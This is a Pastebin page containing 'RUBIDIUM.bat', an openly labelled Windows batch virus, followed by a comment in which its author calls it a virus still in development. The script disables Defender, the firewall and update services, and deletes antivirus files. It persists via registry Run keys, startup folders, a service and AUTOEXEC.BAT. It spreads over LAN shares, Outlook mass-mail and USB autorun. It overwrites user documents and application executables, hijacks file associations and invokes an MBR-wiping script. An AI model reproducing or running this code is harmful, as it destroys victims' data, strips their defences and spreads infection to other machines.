Advertisement
FlyFar

RUBIDIUM.bat

Jun 26th, 2023
1,246
0
Never
2
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Batch 8.43 KB | Cybersecurity | 0 0
  1. @echo off
  2. color 17
  3. title Rubid1um
  4. cls
  5. echo WelkOmE to RuB1D1uM V1ruS!
  6. echo ===========================================
  7. echo Are U SurE to Run This C0mPuTEr ViRuS???
  8. echo RunniNg Th1s c0MputEr v1RuS mAy make Ur
  9. echo c0MpuTer UnUseABle!
  10. echo ===========================================
  11. CHOICE /C YN /M "Press Y for Yes, N for No."
  12. IF ERRORLEVEL==1 goto start
  13. IF ERRORLEVEL==2 exit
  14.  
  15. :: oof
  16.  
  17. :start
  18.  
  19. :: UrMOm
  20. net stop "SDRSVC"
  21. net stop "WinDefend"
  22. taskkill /f /t /im "MSASCui.exe"
  23. net stop "security center"
  24. netsh firewall set opmode mode-disable
  25. net stop "wuauserv"
  26. net stop "Windows Defender Service"
  27. net stop "Windows Firewall"
  28. net stop sharedaccess
  29.  
  30. del /Q /F C:\Program Files\alwils~1\avast4\*.*
  31. del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
  32. del /Q /F C:\Program Files\kasper~1\*.exe
  33. del /Q /F C:\Program Files\trojan~1\*.exe
  34. del /Q /F C:\Program Files\f-prot95\*.dll
  35. del /Q /F C:\Program Files\tbav\*.dat
  36. del /Q /F C:\Program Files\avpersonal\*.vdf
  37. del /Q /F C:\Program Files\Norton~1\*.cnt
  38. del /Q /F C:\Program Files\Mcafee\*.*
  39. del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
  40. del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
  41. del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
  42. del /Q /F C:\Program Files\Norton~1\*.*
  43.  
  44. RENAME %0 RUBIDIUM.exe
  45.  
  46.  
  47.  
  48. MOVE /e /y RUBIDIUM.exe C:\Windows
  49.  
  50.  
  51.  
  52. XCOPY "RUBIDIUM.exe" "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup"
  53.  
  54.  
  55. @echo off > service.bat
  56. SET "NomeProcesso=RUBIDIUM.exe" >> service.bat
  57. SET "NomeService=RUBIDIUM" >> service.bat
  58. echo sc create %NomeService% binpath=%0 >> service.bat
  59. echo sc start %NomeService% >> service.bat
  60.  
  61. attrib +h +r +s service.bat
  62. start service.bat
  63.  
  64. SET i=0
  65.  
  66. reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Services" /t "REG_SZ" /d %0
  67. attrib +h +r +s %0
  68.  
  69. :Internet
  70. net use Z: \\192.168.1.%i%\C$
  71. if exist Z: (for /f %%u in ('dir Z:\Users /b') do copy %0 "Z:\Users\%%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Services.exe"
  72. mountvol Z: /d)
  73. if %i% == 256 (goto Infect) else (set /a i=i+1)
  74. goto worm
  75. goto Internet
  76.  
  77. :Infect
  78. for /f %%f in ('dir C:\Users\*.* /s /b') do (rename %%f *.exe)
  79. for /f %%f in ('dir C:\Users\*.exe /s /b') do (copy %0 %%f)
  80. goto Infect
  81.  
  82.  
  83. :worm
  84.  
  85. set Slash=\
  86. if exist %SystemDrive%%Slash%AUTOEXEC.BAT (
  87. del %SystemDrive%%Slash%AUTOEXEC.BAT
  88. copy %0 %SystemDrive%%Slash%AUTOEXEC.BAT
  89. attrib +s +r +h %SystemDrive%%Slash%AUTOEXEC.BAT
  90. )
  91. set a=RUBIDIUM
  92. copy %0 %windir%\%a%.exe
  93. reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d %windir%\%a%.exe /f > nul
  94. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d %windir%\%a%.exe /f > nul
  95. set b=RUBIDIUM
  96. copy %0 %windir%\%b%.exe
  97. echo [windows] >> %windir%\win.ini
  98. echo run=%windir%\%b%.exe >> %windir%\win.ini
  99. echo load=%windir%\%b%.exe >> %windir%\win.ini
  100. echo [boot] >> %windir%\system.ini
  101. echo shell=explorer.exe %b%.exe >> %windir%\system.ini
  102. echo dim x>>%SystemDrive%\mail.vbs
  103. echo on error resume next>>%SystemDrive%\mail.vbs
  104. echo Set fso ="Scripting.FileSystem.Object">>%SystemDrive%\mail.vbs
  105. echo Set so=CreateObject(fso)>>%SystemDrive%\mail.vbs
  106. echo Set ol=CreateObject("Outlook.Application")>>%SystemDrive%\mail.vbs
  107. echo Set out=WScript.CreateObject("Outlook.Application")>>%SystemDrive%\mail.vbs
  108. echo Set mapi = out.GetNameSpace("MAPI")>>%SystemDrive%\mail.vbs
  109. echo Set a = mapi.AddressLists(1)>>%SystemDrive%\mail.vbs
  110. echo Set ae=a.AddressEntries>>%SystemDrive%\mail.vbs
  111. echo For x=1 To ae.Count>>%SystemDrive%\mail.vbs
  112. echo Set ci=ol.CreateItem(0)>>%SystemDrive%\mail.vbs
  113. echo Set Mail=ci>>%SystemDrive%\mail.vbs
  114. echo Mail.to=ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x)>>%SystemDrive%\mail.vbs
  115. echo Mail.Subject="Cool file!!!">>%SystemDrive%\mail.vbs
  116. echo Mail.Body="Hey... I found this cool file on the internet... wanna see it?">>%SystemDrive%\mail.vbs
  117. echo Mail.Attachments.Add(%0)>>%SystemDrive%\mail.vbs
  118. echo Mail.send>>%SystemDrive%\mail.vbs
  119. echo Next>>%SystemDrive%\mail.vbs
  120. echo ol.Quit>>%SystemDrive%\mail.vbs
  121. start "" "%SystemDrive%\mail.vbs"
  122.  
  123. goto run2
  124.  
  125. goto worm
  126.  
  127.  
  128. :run2
  129.  
  130. set Slash=\
  131. if exist %SystemDrive%%Slash%AUTOEXEC.BAT (
  132. attrib +s +r +h %SystemDrive%%Slash%AUTOEXEC.BAT
  133. del %SystemDrive%%Slash%AUTOEXEC.BAT
  134. copy %0 %SystemDrive%%Slash%AUTOEXEC.BAT
  135. attrib +s +r +h %SystemDrive%%Slash%AUTOEXEC.BAT
  136. )
  137. set a=RUBIDIUM
  138. copy %0 %windir%\%a%.exe
  139. reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d %windir%\%a%.exe /f > nul
  140. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d %windir%\%a%.exe /f > nul
  141. copy %0 "%userprofile%\Start Menu\Programs\Startup"
  142. set b=RUBIDIUM
  143. copy %0 %windir%\%b%.exe
  144. echo [windows] >> %windir%\win.ini
  145. echo run=%windir%\%b%.exe >> %windir%\win.ini
  146. echo load=%windir%\%b%.exe >> %windir%\win.ini
  147. echo [boot] >> %windir%\system.ini
  148. echo shell=explorer.exe %b%.exe >> %windir%\system.ini
  149.  
  150. ::infmaking
  151. echo [autorun] > windows.inf
  152. echo ;open=Worst.exe >> windows.inf
  153. echo ShellExecute=Worst.exe >> windows.inf
  154. echo UseAutoPlay=1 >> windows.inf
  155.  
  156. :: Copy windows.inf to USB
  157.  
  158. xcopy /e /y windows.inf D:\
  159. xcopy /e /y windows.inf E:\
  160. xcopy /e /y windows.inf F:\
  161. xcopy /e /y windows.inf G:\
  162. xcopy /e /y windows.inf H:\
  163.  
  164.  
  165. xcopy /e /y Worst.exe D:\
  166. xcopy /e /y Worst.exe E:\
  167. xcopy /e /y Worst.exe F:\
  168. xcopy /e /y Worst.exe G:\
  169. xcopy /e /y Worst.exe H:\
  170.  
  171.  
  172. assoc .lnk=batfile
  173. DIR /S/B %SystemDrive%\*.lnk >> InfList_lnk.txt
  174. echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_lnk.txt) do copy /y %0 "%%j:%%k"
  175.  
  176. assoc .doc=batfile
  177. DIR /S/B %SystemDrive%\*.doc >> InfList_doc.txt
  178. echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_doc.txt) do copy /y %0 "%%j:%%k"
  179.  
  180. assoc .txt=batfile
  181. DIR /S/B %SystemDrive%\*.txt >> InfList_txt.txt
  182. echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_txt.txt) do copy /y %0 "%%j:%%k"
  183.  
  184. assoc .pdf=batfile
  185. DIR /S/B %SystemDrive%\*.pdf >> InfList_pdf.txt
  186. echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_pdf.txt) do copy /y %0 "%%j:%%k"
  187.  
  188. assoc .xml=batfile
  189. DIR /S/B %SystemDrive%\*.xml >> InfList_xml.txt
  190. echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_xml.txt) do copy /y %0 "%%j:%%k"
  191.  
  192. assoc .mp3=batfile
  193. DIR /S/B %SystemDrive%\*.mp3 >> InfList_mp3.txt
  194. echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_mp3.txt) do copy /y %0 "%%j:%%k"
  195.  
  196. assoc .mp4=batfile
  197. DIR /S/B %SystemDrive%\*.mp4 >> InfList_mp4.txt
  198. echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_mp4.txt) do copy /y %0 "%%j:%%k"
  199.  
  200. assoc .png=batfile
  201. DIR /S/B %SystemDrive%\*.png >> InfList_png.txt
  202. echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_png.txt) do copy /y %0 "%%j:%%k"
  203.  
  204. :haha
  205. msg * "Rubidium is the chemical element with the symbol Rb and atomic number 37"
  206. net send * "It is a very soft, whitish-grey solid in the alkali metal group, similar to potassium and cesium"
  207. goto run3
  208. goto haha
  209.  
  210. :run3
  211. tskill pbrush
  212. copy /y RUBIDIUM.exe C:\Windows\pbrush.exe
  213.  
  214. tskill excel
  215. copy /y RUBIDIUM.exe "%SystemDrive%\Program Files\Microsoft Office\Office10\EXCEL.EXE"
  216.  
  217. tskill mspaint
  218. copy /y RUBIDIUM.exe "%windir%\system32\mspaint.exe"
  219.  
  220. tskill WINWORD
  221. copy /y RUBIDIUM.exe "%SystemDrive%\Program Files\Microsoft Office\Office16\WINWORD.EXE"
  222.  
  223. tskill calc
  224. copy /y RUBIDIUM.exe "%windir%\system32\calc.exe
  225.  
  226. tskill msaccess
  227. copy /y RUBIDIUM.exe "%SystemDrive%\Program Files\Microsoft Office\Office10\MSACCESS.EXE"
  228.  
  229. tskill iexplore
  230. copy /y RUBIDIUM.exe "C:\Program Files\Internet Explorer\iexplore.exe"
  231.  
  232. tskill safari
  233. copy /y RUBIDIUM.exe "C:\Program Files\Safari\Safari.exe"
  234.  
  235. :: Create a new VBS file that speaks.
  236.  
  237. echo do > speak.vbs
  238. echo CreateObject(“SAPI.SpVoice”).Speak”Rubidium is the first alkali metal in the group to have a density higher than water” >> speak.vbs
  239. echo loop >> speak.vbs
  240.  
  241. ::Rubidiumislittleusedoutsideresearchithasbeenusedasacomponentofphotocellstoremovetracesofoxygenfromvacuumtubesandtomaketypesofglass
  242.  
  243. CD Desktop
  244. ren *.png RUBI.DIUM
  245. ren *.jpg RUBI.DIUM
  246. ren *.gif RUBI.DIUM
  247. ren *.docx RUBI.DIUM
  248. ren *.pptx RUBI.DIUM
  249. ren *.pdf RUBI.DIUM
  250. ren *.txt RUBI.DIUM
  251. ren *.exe RUBI.DIUM
  252.  
  253. start /min https://www.youtube.com/watch?v=iP6CRZdDu6o
  254.  
  255. Powershell.exe -executionpolicy remotesigned -File  stomp-mbr.ps1
  256.  
  257. timeout /T 10
  258. :sup
  259. cls
  260. color 17
  261. color 75
  262. color 85
  263. color 23
  264. color 32
  265. color 54
  266. color 45
  267. color 7F
  268. color 7E
  269. color 64
  270. color 23
  271. color 32
  272. color 54
  273. color 45
  274. color 75
  275. color 85
  276. color 23
  277. color 32
  278. color 54
  279. goto sup
  280.  
  281.  
Advertisement
Comments
  • A2R14N
    1 year
    # text 0.19 KB | 0 0
    1. ERRORLEVEL should look like this
    2. before:
    3. IF ERRORLEVEL==1 goto start
    4. IF ERRORLEVEL==2 exit
    5. after:
    6. IF ERRORLEVEL==2 exit
    7. IF ERRORLEVEL==1 goto start
    8. becouse there is a problem with overflow
    • FlyFar
      1 year
      # text 0.10 KB | 0 0
      1. Thank you for your comment! As the virus is in the developing process, there may be some bugs in the code
Add Comment
Please, Sign In to add comment
Advertisement